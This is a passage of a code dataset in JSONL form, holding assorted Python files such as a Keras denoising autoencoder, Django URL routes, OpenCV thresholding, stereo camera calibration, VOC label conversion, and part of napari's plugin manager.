random.choice([0.0,0.2,0.5,0.7])\n\tNN2Config = dict()\n\tNN2Config[\"shapes\"] = random.choice([32,64,128,256])\n\tNN2Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tgamma1Config = dict()\n\tgamma1Config[\"shapes\"] = random.choice([32,64,128,256])\n\tgamma1Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tgamma2Config = dict()\n\tgamma2Config[\"shapes\"] = random.choice([32,64,128,256])\n\tgamma2Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\toutConfig = dict()\n\toutConfig[\"shapes\"] = random.choice([32,64,128,256])\n\toutConfig[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tconfigs = [config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig]\n\tprint configs\n\ttrain_mfn(X_train, y_train, X_valid, y_valid, X_test, y_test, configs)\n\n\"\"\"\n","sub_path":"src/models/M3ER/modules/mfn.py","file_name":"mfn.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"401393435","text":"import numpy as np\nimport pylab as plt\n\ndef calc_req(A,B,C,D,E):\n X = B*A/(A+B+C)\n Y = B*C/(A+B+C)\n Z = A*C/(A+B+C)\n return X + (D+Y)*(E+Z)/(D+Y+E+Z)\n\nomega = np.logspace(6,12,1000)\n\nCE = 1e-6\nCD = 6e-6\n#D = 1/1j/omega/CD\nD = 1j*omega*CD\nE = 1/1j/omega/CE\nA = 1e5\nB = 1e2\nC = 1e3\n\nz = calc_req(A,B,C,D,E)\nplt.plot(omega,np.real(z),label='real')\nplt.xscale('log')\n#plt.plot(omega,np.imag(z),label='imag')\n#plt.plot(omega,np.abs(z),label='abs')\nplt.legend()\nplt.show()\n\n","sub_path":"soft-ir-fitting/data/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"163254528","text":"from django.conf.urls import url\nfrom . import views\nfrom . api import PostApi, CommentApi\n\napp_name = 'post'\n\nurlpatterns = [\n url(r'^$',views.PostListView.as_view(), name='post_list'),\n url(r'^about/$',views.AboutView.as_view(),name='about'),\n url(r'^post/(?P\\d+)$',views.PostDetailView.as_view(),name='post_detail'),\n url(r'^post/new$',views.CreatePostView.as_view(),name='post_new'),\n url(r'^post/(?P\\d+)/edit/$',views.PostUpdateView.as_view(),name='post_edit'),\n url(r'^post/(?P\\d+)/edit/remove/$',views.PostDeleteView.as_view(),name='post_remove'),\n url(r'^draft/$',views.DraftListView.as_view(),name='post_draft_list'),\n url(r'^post/(?P\\d+)/publish/$', views.post_publish, name='post_publish'),\n url(r'^post/(?P\\d+)/comment/$',views.add_comments_to_post, name='add_comments_to_post'),\n url(r'^comment/(?P\\d+)/approve/$',views.comment_approve,name='comment_approve'),\n url(r'^comment/(?P\\d+)/remove/$',views.comment_remove,name='comment_remove'),\n url(r'^post$',PostApi.as_view()),\n url(r'^comment$',CommentApi.as_view()),\n]\n","sub_path":"mysite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10141543","text":"# Author imagean\n# !/usr/bin/python\n# -*- coding:utf-8\n# opencv read image is BGR channel,and matplot read is RGB\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimage = cv.imread('C:/Users/19845/Desktop/1234.jpg',0)\nblurred = cv.GaussianBlur(image, (5, 5), 0)\n\n#cv2.ADAPTIVE_THRESH_MEAN_C 平均值\nthresh1 = cv.adaptiveThreshold(blurred, 255,cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 11, 4)\n#cv2.ADAPTIVE_THRESH_GAUSSIAN_C 高斯分布加权和\nthresh2 = cv.adaptiveThreshold(blurred, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 15, 3)\nplt.subplot(131), plt.imshow(blurred, \"gray\"),plt.title(\"Source Image\"), plt.xticks([]), plt.yticks([])\nplt.subplot(132), plt.imshow(thresh1, \"gray\"),plt.title(\"ADAPTIVE_THRESH_MEAN_C \"), plt.xticks([]), plt.yticks([])\nplt.subplot(133), plt.imshow(thresh2, \"gray\"),plt.title(\"ADAPTIVE_THRESH_GAUSSIAN_C \"), plt.xticks([]), plt.yticks([])\nplt.show()","sub_path":"9/005Threhold.py","file_name":"005Threhold.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"483976031","text":"import pandas as pd\nimport datetime\nimport numpy as np\nfrom sklearn import preprocessing\n\nexprs = pd.read_csv(r'C:\\Users\\MrFive1001\\Documents\\PycharmProjects\\Kaggle\\learning2\\exprs_GSE5859.csv',\n sep=',', index_col=0)\nsampleinfo = pd.read_csv(r'C:\\Users\\MrFive1001\\Documents\\PycharmProjects\\Kaggle\\learning2\\sampleinfo_GSE5859.csv',\n sep=',')\n\na = list(sampleinfo.filename)\nb = list(exprs.columns)\nmatchIndex = [b.index(x) for x in a]\n\nexprs = exprs.iloc[:, matchIndex]\nprint(exprs.head())\nprint(sampleinfo.head())\n\nsampleinfo.date = pd.to_datetime(sampleinfo.date)\nsampleinfo['year'] = [i.year for i in sampleinfo.date]\nsampleinfo['month'] = [i.month for i in sampleinfo.date]\n\nspecial = datetime.datetime(2002, 10, 31)\nsampleinfo['elapsedInDays'] = [i - special for i in sampleinfo.date]\nprint(sampleinfo.head())\n\nCEUsample = sampleinfo[sampleinfo.ethnicity == 'CEU'].copy()\nprint(CEUsample.head())\nCEUexprs = exprs.iloc[:, np.arange(len(exprs.columns))[sampleinfo.ethnicity == 'CEU']].copy()\npd.DataFrame(preprocessing.minmax_scale(CEUexprs), index=CEUexprs.index, columns=CEUexprs.columns)\n","sub_path":"Algor/MachineLea/000data_analyse/learning2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"169701234","text":"def nucleotide_to_rna(nucleotide):\n if nucleotide == 'G':\n nucleotide = 'C'\n elif nucleotide == 'C':\n nucleotide = 'G'\n elif nucleotide == 'T':\n nucleotide = 'A'\n elif nucleotide == 'A':\n nucleotide = 'U'\n return nucleotide\n\ndef to_rna(strand):\n return ''.join(map(nucleotide_to_rna, strand))\n","sub_path":"python/rna-transcription/rna_transcription.py","file_name":"rna_transcription.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"600117255","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.python.compiler.mlcompute import mlcompute\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow\n\nmlcompute.set_mlc_device(device_name='gpu')\ntf.config.run_functions_eagerly(False)\n\n(x_train, _), (x_test, _) = mnist.load_data()\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = np.reshape(x_train, (len(x_train), 28, 28, 1))\nx_test = np.reshape(x_test, (len(x_test), 28, 28, 1))\n\nnoise_factor = 0.5\n# numpy.random.normal 函數裡的三個參數分别代表生成的高斯分布的均值、標準差以及輸出的 size\nx_train_noisy = x_train + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_train.shape) \nx_test_noisy = x_test + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_test.shape)\n\nx_train_noisy = np.clip(x_train_noisy, 0., 1.) # 把 array 限制在一定範圍内\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\ninput_img = layers.Input(shape=(28, 28, 1)) # adapt this if using `channels_first` image data format \n# Encoder 使用卷積層,激活函數用 relu,輸入的維度就是上面定義的 input_img\nx = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(input_img)\nx = layers.MaxPooling2D((2, 2), padding='same')(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\nx = layers.MaxPooling2D((2, 2), padding='same')(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\n# 這邊與官方有點不同,我們為編碼器設置了一個名稱,以便能夠訪問它\nencoded = layers.MaxPooling2D((2, 2), padding='same', name='encoder')(x) \n\n# at this point the representation is (4, 4, 8) i.e. 128-dimensional: 4*4*8=128\n\n# Decoder 的過程與 Encoder 正好相反,需要跟 Encoder 的神經網絡層做相對應,相對應的激活函數也是一樣,\n# 但這邊在解碼中最後一層使用的激活函數是 sigmoid\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(encoded)\nx = layers.UpSampling2D((2, 2))(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\nx = layers.UpSampling2D((2, 2))(x)\nx = layers.Conv2D(16, (3, 3), activation='relu')(x)\nx = layers.UpSampling2D((2, 2))(x)\ndecoded = layers.Conv2D(1, (3, 3), activation='sigmoid', padding='same')(x)\n\n# 用 Model 來搭建模型,輸入為圖片,輸出是解碼的結果\nautoencoder = keras.Model(input_img, decoded) \n\n# 編譯模型,optimizer 使用 adam,loss 使用 binary_crossentropy\nautoencoder.compile(optimizer='adam', loss='binary_crossentropy')\n\n# 訓練 Denoising AE ,輸入是加入雜訊的圖片,輸出是原始圖片\nautoencoder.fit(x_train_noisy, x_train,\n epochs=20,\n batch_size=128,\n shuffle=True,\n validation_data=(x_test_noisy, x_test))\n\nautoencoder.save('auto-encoder/denoising.h5') # 與官方有點不同的是,多做了保存模型的動作c","sub_path":"auto-encoder/denoising-model.py","file_name":"denoising-model.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"193832054","text":"import re\nimport os\nimport sys\nfrom datetime import datetime\n\nimport numpy as np\nimport scipy.io as sio\nimport datajoint as dj\n\nschema = dj.schema(dj.config.get('database.prefix', '') + 'reference')\n\n\n@schema\nclass AnimalSource(dj.Lookup):\n definition = \"\"\"\n animal_source: varchar(32) # source of the animal, Jax, Charles River etc.\n \"\"\"\n contents = zip(['Jackson', 'Charles River', 'Guoping Feng', 'Homemade', 'Unknown'])\n\n\n@schema\nclass Strain(dj.Lookup):\n definition = \"\"\" \n strain: varchar(24)\n \"\"\"\n contents = zip(['C57', 'Ai35D', 'VGAT-ChR2-EYFP', 'Ai32', 'GAD2-Cre', 'PV-Cre', 'Unknown'])\n\n\n@schema\nclass Laboratory(dj.Lookup):\n definition = \"\"\" \n lab_name: varchar(24) # name of lab\n ---\n lab_description=null: varchar(128) \n \"\"\"\n contents = [['WangLab', 'WangLab']]\n\n\n@schema\nclass InjectionType(dj.Lookup):\n definition = \"\"\" \n injection_type: varchar(30) # # (Str) what kind of tracer/injection\n \"\"\"\n contents = zip(['flourescent'])\n","sub_path":"project_schemas/atlas_schema_python_v3/atlas_pipeline/reference.py","file_name":"reference.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"229187431","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nEventSource for NectarCam protobuf-fits.fz-files.\n\nNeeds protozfits v1.02.0 from github.com/cta-sst-1m/protozfitsreader\n\"\"\"\n\nimport numpy as np\nfrom .eventsource import EventSource\nfrom .containers import NectarCAMDataContainer\n\n__all__ = ['NectarCAMEventSource']\n\n\nclass NectarCAMEventSource(EventSource):\n\n def __init__(self, config=None, tool=None, **kwargs):\n super().__init__(config=config, tool=tool, **kwargs)\n from protozfits import File\n self.file = File(self.input_url)\n self.header = next(self.file.RunHeader)\n\n\n def _generator(self):\n\n self._pixel_sort_ids = None\n\n for count, event in enumerate(self.file.Events):\n data = NectarCAMDataContainer()\n data.count = count\n # fill specific NectarCAM data\n data.nectarcam.fill_from_zfile_event(event, self.header.numTraces)\n # fill general R0 data\n self.fill_R0Container_from_zfile_event(data.r0, event)\n yield data\n\n\n @staticmethod\n def is_compatible(file_path):\n from astropy.io import fits\n try:\n # The file contains two tables:\n # 1: RunHeader\n # 2: Events <--- this is what we need to look at\n h = fits.open(file_path)[2].header\n ttypes = [\n h[x] for x in h.keys() if 'TTYPE' in x\n ]\n except OSError:\n # not even a fits file\n return False\n\n except IndexError:\n # A fits file of a different format\n return False\n\n is_protobuf_zfits_file = (\n (h['XTENSION'] == 'BINTABLE') and\n (h['EXTNAME'] == 'Events') and\n (h['ZTABLE'] is True) and\n (h['ORIGIN'] == 'CTA') and\n (h['PBFHEAD'] == 'DataModel.CameraEvent')\n )\n\n is_nectarcam_file = 'hiGain_integrals_gains' in ttypes\n return is_protobuf_zfits_file & is_nectarcam_file\n\n\n def fill_R0CameraContainer_from_zfile_event(self, container, event):\n container.trigger_time = (\n event.local_time_sec * 1E9 + event.local_time_nanosec)\n container.trigger_type = event.event_type\n\n container.waveform = np.array([\n (\n event.hiGain.waveforms.samples\n ).reshape(-1, self.header.numTraces),\n (\n event.loGain.waveforms.samples\n ).reshape(-1, self.header.numTraces)\n ])\n\n container.num_samples = container.waveform.shape[1]\n\n def fill_R0Container_from_zfile_event(self, container, event):\n container.obs_id = -1\n container.event_id = event.eventNumber\n\n container.tels_with_data = [self.header.telescopeID, ]\n r0_cam_container = container.tel[self.header.telescopeID]\n self.fill_R0CameraContainer_from_zfile_event(\n r0_cam_container,\n event\n )\n","sub_path":"ctapipe/io/nectarcameventsource.py","file_name":"nectarcameventsource.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"546967468","text":"import re\n\npattern = re.compile(r\"(\\w+) (\\w+)\")\n\nstr = \"hello 123, hello 456\"\nm = pattern.sub(\"hello world\",str)\n\nprint(m)\n\nm2 = pattern.sub(r\"\\1 \\2\", str)\nprint(m2)","sub_path":"re_sub.py","file_name":"re_sub.py","file_ext":"py","file_size_in_byte":165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"349621956","text":"\n #\n# % # ***************************************************************************\n# % # Stereo Vision - Thermal\n# % # ---------------------------------\n# % # Written by: Lakitha Omal Harindha Wijeratne\n# % # - for -\n# % # Mints: Multi-scale Integrated Sensing and Simulation\n# % # ---------------------------------\n# % # Date: January 23rd, 2020\n# % # ---------------------------------\n# % # This module is written for generic implimentation of MINTS projects\n# % # --------------------------------------------------------------------------\n# % # https://github.com/mi3nts\n# % # http://utdmints.info/\n# % # ***************************************************************************\n#\n# Chapter_05 : Saving Left and Thermal Parameters for Matlab\n\n\nimport cv2\nimport pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\n\n\nprint(cv2.__version__)\n\nprint(\"Loading data from the stereo calibration\")\n\nstereoParams = pickle.load(open(\"stereoParams_Feb_12_2020.p\", \"rb\"))\nthermalParams = pickle.load(open(\"thermalParams_Feb_12_2020.p\", \"rb\"))\n\nprint(stereoParams)\n\n# Matlab needs the calibrated images to get the images for dewarping\n# The following block of code is used to dewarping the images and\n# saving them\n\n\nprint(stereoParams)\n\nfileNamePre = '../threeWayImageDataSets/utdSet4/'\nfileNamePost = '../threeWayImageDataSets/utdSet4PyCalibrated/'\n\ntimeCurrentAll = [ \\\n '040_11_05_17_58_00_', \\\n '050_11_05_17_58_28_', \\\n '060_11_05_17_58_56_', \\\n '070_11_05_17_59_24_', \\\n '080_11_05_17_59_52_', \\\n '090_11_05_18_00_28_', \\\n '100_11_05_18_00_56_', \\\n '110_11_05_18_01_17_', \\\n '120_11_05_18_01_52_', \\\n '130_11_05_18_02_27_', \\\n '140_11_05_18_02_48_', \\\n '150_11_05_18_03_23_', \\\n '160_11_05_18_03_44_', \\\n '170_11_05_18_04_41_', \\\n '180_11_05_18_05_02_', \\\n '190_11_05_18_05_44_', \\\n '200_11_05_18_06_12_', \\\n '210_11_05_18_07_08_', \\\n '220_11_05_18_07_36_', \\\n '230_11_05_18_08_05_', \\\n '240_11_05_18_08_33_', \\\n '250_11_05_18_09_29_', \\\n '260_11_05_18_10_04_', \\\n '270_11_05_18_10_32_', \\\n '280_11_05_18_11_21_', \\\n '290_11_05_18_11_57_', \\\n '300_11_05_18_12_32_', \\\n ]\n\ndef directoryCheck(outputPath):\n\n exists = os.path.isfile(outputPath)\n print(exists)\n directoryIn = os.path.dirname(outputPath)\n print(directoryIn)\n if not os.path.exists(directoryIn):\n os.makedirs(directoryIn)\n return exists\n\n\nfor timeCurrent in timeCurrentAll:\n\n print(\"============\")\n print(timeCurrent)\n leftImageName = fileNamePre + 'leftNegative/' + timeCurrent +'leftNegative.jpg'\n rightImageName = fileNamePre + 'rightNegative/' + timeCurrent +'rightNegative.jpg'\n thermalImageName = fileNamePre + 'thermal/' + timeCurrent +'thermal.jpg'\n\n leftImageNamePost = fileNamePost + 'leftNegative/' + timeCurrent +'leftNegative.jpg'\n rightImageNamePost = fileNamePost+ 'rightNegative/' + timeCurrent +'rightNegative.jpg'\n thermalImageNamePost = fileNamePost+ 'thermal/' + timeCurrent +'thermal.jpg'\n\n imLeft = cv2.imread(leftImageName)\n imRight = cv2.imread(rightImageName)\n imThermal = cv2.imread(thermalImageName)\n\n imLeftRemapped =cv2.remap(imLeft,stereoParams['mapXLeft'],\\\n stereoParams['mapYLeft'],\\\n cv2.INTER_CUBIC)\n imRightRemapped=cv2.remap(imRight,stereoParams['mapXRight'],\\\n stereoParams['mapYRight'],\n cv2.INTER_CUBIC)\n\n imThermalRemapped = cv2.undistort(\\\n imThermal,\\\n thermalParams['mtxThermal'],\\\n thermalParams['distThermal']\n , None,\\\n thermalParams['newcameramtx']\\\n )\n\n\n\n directoryCheck(leftImageNamePost)\n directoryCheck(rightImageNamePost)\n directoryCheck(thermalImageNamePost)\n\n cv2.imwrite(leftImageNamePost, imLeftRemapped);\n cv2.imwrite(rightImageNamePost, imRightRemapped);\n cv2.imwrite(thermalImageNamePost, imThermalRemapped);\n","sub_path":"firmware/oldCode/pythonReplica/MC_05_1_saveImagesForMatLab.py","file_name":"MC_05_1_saveImagesForMatLab.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"437273096","text":"from polynomials import Polynomial\nimport pytest\n\n\n@pytest.mark.parametrize(\n \"f, x, val\",\n (((0, 1), 8, 8),\n ((2, 0, 3), -3, 29),\n ((4, 2), -11, -18))\n )\ndef test_call(f, x, val):\n assert Polynomial(f)(x) == val\n","sub_path":"exercise_03/exercise_3_YanisMiraoui/tests/test_exercise_3_3_4.py","file_name":"test_exercise_3_3_4.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"640281279","text":"import sys\nimport collections\n\ndef find_longest_word_in_string(letters, words):\n dd = collections.defaultdict(lambda: 'N/A')\n Pair = collections.namedtuple('pair', ['w', 'i'])\n for word in words:\n if dd[word[0]] == 'N/A':\n dd[word[0]] = []\n dd[word[0]].append(Pair(word, 0))\n for letter in letters:\n if dd[letter] == 'N/A':\n pass\n else:\n pairs = dd[letter][:]\n dd[letter] = []\n for pair in pairs:\n if len(pair.w) > pair.i:\n pair = Pair(pair.w, pair.i + 1)\n if len(pair.w) > pair.i:\n if dd[pair.w[pair.i]] == 'N/A':\n dd[pair.w[pair.i]] = []\n dd[pair.w[pair.i]].append(pair)\n else:\n dd[letter].append(pair)\n resPair = Pair('', 0)\n for letter in dd:\n for pair in dd[letter]:\n if pair.i > resPair.i:\n resPair = pair\n return resPair.i, resPair.w\n\nif __name__ == '__main__':\n S = \"abppplee\"\n D = [\"able\", \"ale\", \"apple\", \"bale\", \"kangaroo\"]\n i, w = find_longest_word_in_string(S, D)\n print(i, w)","sub_path":"interviews/googletechdevguide/1-find-longest-word-in-dictionary-that-subsequence-of-given-string/MyAnswer.py","file_name":"MyAnswer.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263185380","text":"my_dict = { 'name': 'Ewelina', 'age': 26}\n\nuniversities = [\n {\n 'name': 'Oxford',\n 'location': 'UK'\n }\n]\n\n\n\nlottery_players = [\n{\n 'name': 'Rolf',\n 'numbers': (13, 45, 66, 23, 22)\n},\n{\n 'name': 'John',\n 'numbers': (14, 56, 80, 23, 22)\n}\n]\n\nlottery_players[0]['numbers'].total()\n","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"42250203","text":"# from django.http.response import HttpResponse\n# from django.conf import settings\n# import os\nfrom django.shortcuts import redirect\nfrom core.models import Target, Activity\n\n\ndef get_pixel(request, id):\n \"\"\"\n get ID from URL, fetch TARGET object for that ID REDIRECT to the target object's redirect_uri\n \"\"\"\n try:\n target = Target.objects.get(id=id)\n redirect_uri = target.redirect_uri\n data = request.META\n activity = Activity.objects.create(\n target=target,\n # remote_addr=data.get('REMOTE_ADDR'),\n remote_addr=data.get('HTTP_X_FORWARDED_FOR'),\n user_agent=data.get('HTTP_USER_AGENT')\n )\n print(data)\n print(f'TARGET: {target.__dict__}')\n print(f'ACTIVITY: {activity.__dict__}')\n return redirect(redirect_uri)\n except Exception as e:\n print(f'EXCEPTION: << id {id} >> {str(e)}')\n return redirect('https://www.example.com')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"356036154","text":"from math import sqrt, log, modf\n\nlimit = 1000000\nfib = [0] * (limit+1)\n\n\ndef digits_fib(n):\n return -log(5,10) / 2 + n * log((1 + sqrt(5)) / 2, 10)\n\n\ndef compute():\n f_0, f_1 = 0, 1\n i = 2\n while True:\n temp = (f_0 + f_1) % (10**9)\n f_0 = f_1\n f_1 = temp\n if \"\".join(sorted((list(str(f_1))))) == '123456789':\n first_digits = modf(10**(modf(digits_fib(i))[0]+8))[1]\n if \"\".join(sorted(list(str(first_digits))))[2:] == '123456789':\n return i\n i += 1\n\n\nif __name__ == \"__main__\":\n print(compute())\n","sub_path":"Python/104.py","file_name":"104.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"334003378","text":"\n\nfrom xai.brain.wordbase.nouns._phial import _PHIAL\n\n#calss header\nclass _PHIALS(_PHIAL, ):\n\tdef __init__(self,): \n\t\t_PHIAL.__init__(self)\n\t\tself.name = \"PHIALS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"phial\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_phials.py","file_name":"_phials.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"559663672","text":"\"\"\"******************************************************************************\n* Purpose: Distinct Tripletes\n*\n* @author: Nikhil Lad\n* @version: 3.7\n* @since: 24-12-2018\n*\n******************************************************************************\n\"\"\"\n\nfrom Utility import utilities\nu=utilities.util()\n\ndef distince_triples():\n l = []\n try:\n\n a=int(input(\"numbers\"))\n for i in range(0,a):\n x = int(input(\"enter no. \\n\"))\n l.insert(i, x)\n print(l)\n u.distinct_triples(l)\n except ValueError:\n print(\"Enter valid number\")\ndistince_triples()\nif __name__ == \"__main__\":\n distince_triples()","sub_path":"DistinctTriples.py","file_name":"DistinctTriples.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"373261290","text":"# -*- coding: UTF-8 -*-\nimport glob\nimport xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\n\nsets=[('2012', 'TCFBA'), ('2012', 'TDINR'), ('2012', 'TDNPR'), ('2012', 'TEOTS'), ('2012', 'TEWR0'),('2012', 'TPDPL'),('2012', 'TSFAS'),('2012', 'TTP2S')]\n\nclasses = [\"TCFBA\", \"TDINR\", \"TDNPR\", \"TEOTS\", \"TEWR0\",\"TPDPL\",\"TSFAS\",\"TTP2S\"]\n\n\ndef convert(size, box):\n dw = 1./(size[0])\n dh = 1./(size[1])\n x = (box[0] + box[1])/2.0 - 1\n y = (box[2] + box[3])/2.0 - 1\n w = box[1] - box[0]\n h = box[3] - box[2]\n x = x*dw\n w = w*dw\n y = y*dh\n h = h*dh\n return (x,y,w,h)\n\ndef convert_annotation(year, image_id):\n print('%s'%(image_id))\n in_file = open('VOCdevkit/VOC%s/Annotations/%s.xml'%(year, image_id))\n out_file = open('VOCdevkit/VOC%s/labels/%s.txt'%(year, image_id), 'w')\n tree=ET.parse(in_file)\n root = tree.getroot()\n size = root.find('size')\n w = int(size.find('width').text)\n h = int(size.find('height').text)\n\n for obj in root.iter('object'):\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult)==1:\n continue\n cls_id = classes.index(cls)\n xmlbox = obj.find('bndbox')\n b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))\n bb = convert((w,h), b)\n out_file.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\nif __name__ == '__main__':\n wd = getcwd()\n\n for year, image_set in sets:\n if not os.path.exists('VOCdevkit/VOC%s/labels/'%(year)):\n os.makedirs('VOCdevkit/VOC%s/labels/'%(year))\n image_ids=glob.glob('/home/baymin/daily-work/new-work/素材/腾讯面板/VOCdevkit/VOC2012/JPEGImages/*.jpg')\n list_file = open('%s_%s.txt'%(year, image_set), 'w')\n for num, image_id in enumerate(image_ids):\n filepath, tmpfilename = os.path.split(image_id)\n filename = os.path.splitext(tmpfilename)[0]\n print('=======%s' % filename)\n if filename == '1' or filename == '-1':\n continue\n list_file.write('%s/VOCdevkit/VOC%s/JPEGImages/%s.jpg\\n'%(wd, year, filename))\n convert_annotation(year, filename)\n list_file.close()\n\n os.system(\"cat *_*.txt > train.txt\")\n os.system(\"cat *_*.txt > val.txt\")\n","sub_path":"darknet-tools/onlyXmlAndJpg2Label.py","file_name":"onlyXmlAndJpg2Label.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"85671528","text":"import Executor\nfrom File import DEFAULT_FILE_INFO\n\n\ndef script(name, stdInput = None, fileInput = DEFAULT_FILE_INFO, stdOutput = None, fileOutput = DEFAULT_FILE_INFO):\n with fileInput.exists():\n fileInput.write(fileInput.data)\n with fileOutput.exists():\n with Executor.run(name) as process:\n stdout, stderr = process.communicate(stdInput)\n assert not stderr, 'There is some errors while script {} was executing: {}'.format(name, stderr)\n assert process.returncode == 0, 'Script {} finished with exit code {}'.format(name, process.returncode)\n assert stdOutput is None or stdout.strip() == stdOutput, 'Script {} output does not match expected.\\nExpected: {}\\nGot: {}'.format(name, stdOutput, stdout)\n if fileOutput != DEFAULT_FILE_INFO:\n fileOutputData = fileOutput.read()\n assert fileOutputData.strip() == fileOutput.data, 'Script {} file {} output does not match expected.\\nExpected: {}\\nGot: {}'.format(name, fileOutput.name, fileOutput.data, fileOutputData)\n","sub_path":"Tests/utils/Assert.py","file_name":"Assert.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"556088097","text":"import importlib\nimport os\nimport pkgutil\nimport sys\nfrom logging import getLogger\nfrom types import ModuleType\nfrom typing import Dict, Generator, Optional, Tuple, Union\n\nimport pluggy\n\nfrom . import _builtins, hook_specifications\nfrom ._hook_callers import _HookCaller\nfrom .exceptions import (\n PluginError,\n PluginImportError,\n PluginRegistrationError,\n fetch_module_metadata,\n)\n\nlogger = getLogger(__name__)\n\nif sys.version_info >= (3, 8):\n from importlib import metadata as importlib_metadata\nelse:\n import importlib_metadata\n\n\npluggy.manager._HookCaller = _HookCaller\n\n\nclass _HookRelay:\n \"\"\"Hook holder object for storing _HookCaller instances.\n\n This object triggers (lazy) discovery of plugins as follows: When a plugin\n hook is accessed (e.g. plugin_manager.hook.napari_get_reader), if\n ``self._needs_discovery`` is True, then it will trigger autodiscovery on\n the parent plugin_manager. Note that ``PluginManager.__init__`` sets\n ``self.hook._needs_discovery = True`` *after* hook_specifications and\n builtins have been discovered, but before external plugins are loaded.\n \"\"\"\n\n def __init__(self, manager: 'PluginManager'):\n self._manager = manager\n self._needs_discovery = False\n\n def __getattribute__(self, name) -> _HookCaller:\n \"\"\"Trigger manager plugin discovery when accessing hook first time.\"\"\"\n if name not in ('_needs_discovery', '_manager'):\n if self._needs_discovery:\n self._manager.discover()\n return object.__getattribute__(self, name)\n\n def items(self):\n \"\"\"Iterate through hookcallers, removing private attributes.\"\"\"\n return [\n (k, val) for k, val in vars(self).items() if not k.startswith(\"_\")\n ]\n\n\nclass PluginManager(pluggy.PluginManager):\n PLUGIN_ENTRYPOINT = \"napari.plugin\"\n PLUGIN_PREFIX = \"napari_\"\n\n def __init__(\n self,\n project_name: str = \"napari\",\n autodiscover: Union[bool, str] = False,\n ):\n \"\"\"pluggy.PluginManager subclass with napari-specific functionality\n\n In addition to the pluggy functionality, this subclass adds\n autodiscovery using package naming 